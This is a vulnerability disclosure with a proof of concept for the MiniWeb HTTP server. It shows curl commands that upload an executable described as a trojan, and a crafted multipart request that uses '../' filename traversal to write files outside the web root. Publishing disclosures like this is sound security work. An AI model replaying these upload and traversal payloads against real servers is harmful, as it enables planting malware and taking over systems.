============================================================================================ Vulnerable Software: MiniWeb (build 300, built on Feb 28 2013) Official Site: http://miniweb.sourceforge.net/ Vulns: Remote arbitrary file upload,Directory traversal. Tested Software/version: MiniWeb (build 300, built on Feb 28 2013) Tested on: Windows XP SP2 32 bit. =================================About software:=========================================== MiniWeb is a mini HTTP server implementation written in C language, featuring low system resource consumption, high efficiency, good flexibility and high portability. It is capable to serve multiple clients with a single thread, supporting GET and POST methods, authentication, dynamic contents (dynamic web page and page variable substitution) and file uploading. MiniWeb runs on POSIX complaint OS, like Linux, as well as Microsoft Windows (Cygwin, MinGW and native build with Visual Studio). The binary size of MiniWeb can be as small as 20KB (on x86 Linux). The target of the project is to provide a fast, functional and low resource consuming HTTP server that is embeddable in other applications (as a static or dynamic library) as well as a standalone web server. MiniWeb supports transparent 7-zip decompression. Web contents can be compressed into 7-zip archieves and clients can access the contents inside the 7-zip archive just like in a directory. MiniWeb can also be used in audio/video streaming applications, or more specific, VOD (video-on-demand) service. Currently a VOD client/server is being developed on MiniWeb. ============================================================================================ About vulns: This software suffers from 2 critical vulns: Any remote/local user can upload arbitrary files to web server. Proof of concept: In this scenario using cygwin +curl remote attacker uploads troyan called "taskmgr.exe" to remote web server. user@myhost /cygdrive/c/dir1/dir2 $ ipconfig Настройка протокола IP для Windows Подключение по локальной сети - Ethernet адаптер: Состояние сети . . . . . . . . . : сеть отключена VirtualBox Host-Only Network - Ethernet адаптер: DNS-суффикс этого подключения . . : IP-адрес . . . . . . . . . . . . : 192.168.0.1 Маска подсети . . . . . . . . . . : 255.255.255.0 Основной шлюз . . . . . . . . . . : 192.168.0.1 user@myhost /cygdrive/c/dir1/dir2 $ curl -I 192.168.0.15:8000 curl: (52) Empty reply from server user@myhost /cygdrive/c/dir1/dir2 $ curl 192.168.0.15:8000 /

Directory of /

Directory content generated by MiniWeb user@myhost /cygdrive/c/dir1/dir2 $ #Uploading remotely our troyan to remote system. user@myhost /cygdrive/c/dir1/dir2 $ curl -i -F name=taskmgr.exe -F filedata=@taskmgr.exe http://192.168.0.15:8000/epicfail/ HTTP/1.1 404 Not Found Server: MiniWeb Content-length: 125 Content-Type: text/html 404 Not Found

Not Found

The requested URL has no content.

user@myhost /cygdrive/c/dir1/dir2 $ #Now fetching directory index from remote system. user@myhost /cygdrive/c/dir1/dir2 $ curl 192.168.0.15:8000 /
..<dir>Sat, 06 Apr 2013 23:55:29 GMT

Directory of /

..<dir>Sat, 06 Apr 2013 23:55:29 GMT
taskmgr.exe329 KBexe fileSun, 07 Apr 2013 00:14:38 GMT
Directory content generated by MiniWeb user@myhost /cygdrive/c/dir1/dir2 user@myhost /cygdrive/c/dir1/dir2 $ #Lol our troyan (taskmgr.exe) uploaded successfully) This is design flaw. user@myhost /cygdrive/c/dir1/dir2 $ curl 192.168.0.15:8000/taskmgr.exe>task2.exe user@myhost /cygdrive/c/dir1/dir2 $ file task2.exe task2.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed user@myhost /cygdrive/c/dir1/dir2 $ rm -rf task2.exe So,this means any remote user can upload,can spoof,can overwrite any files on remote server. Moreover this web server software contains directory traversal vuln. Using the second vuln this is possible to upload any troyan outside of document root to Operation System + spoof some system executables and as result compromise remote operation system in eg on next reboot when it starts. In this case attacker uses FIddler: ================================================================================ METHOD: POST URL: http://192.168.0.15:8000/AAAAAAAAAAAAAAAAAAAAAAA Host: 192.168.0.15:8000 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------78522398122376 Content-Length: 84906 request body: -----------------------------78522398122376 Content-Disposition: form-data; name="user" -----------------------------78522398122376 Content-Disposition: form-data; name="pass" -----------------------------78522398122376 Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../../../OWNED_BY_AKASTEP.txt" Content-Type: image/png Dude! Your machine OwnEd! -----------------------------78522398122376 Content-Disposition: form-data; name="button" Upload -----------------------------78522398122376-- ================================================================================ Few Printscreens: 1remotesystem.PNG http://s019.radikal.ru/i612/1304/09/510e3b430b04.png 2attackersends.PNG http://s017.radikal.ru/i406/1304/a1/494cef4de6f0.png 3remotesystempwned.PNG http://s05.radikal.ru/i178/1304/f3/5fe4d9cb2111.png ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org waraxe.us exploit-db.com to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers+ ottoman38 & HERO_AZE *Super special KUDOS to my bro Brendan Coles! Love you and Respect you dude! Thank you!* ================================================ /AkaStep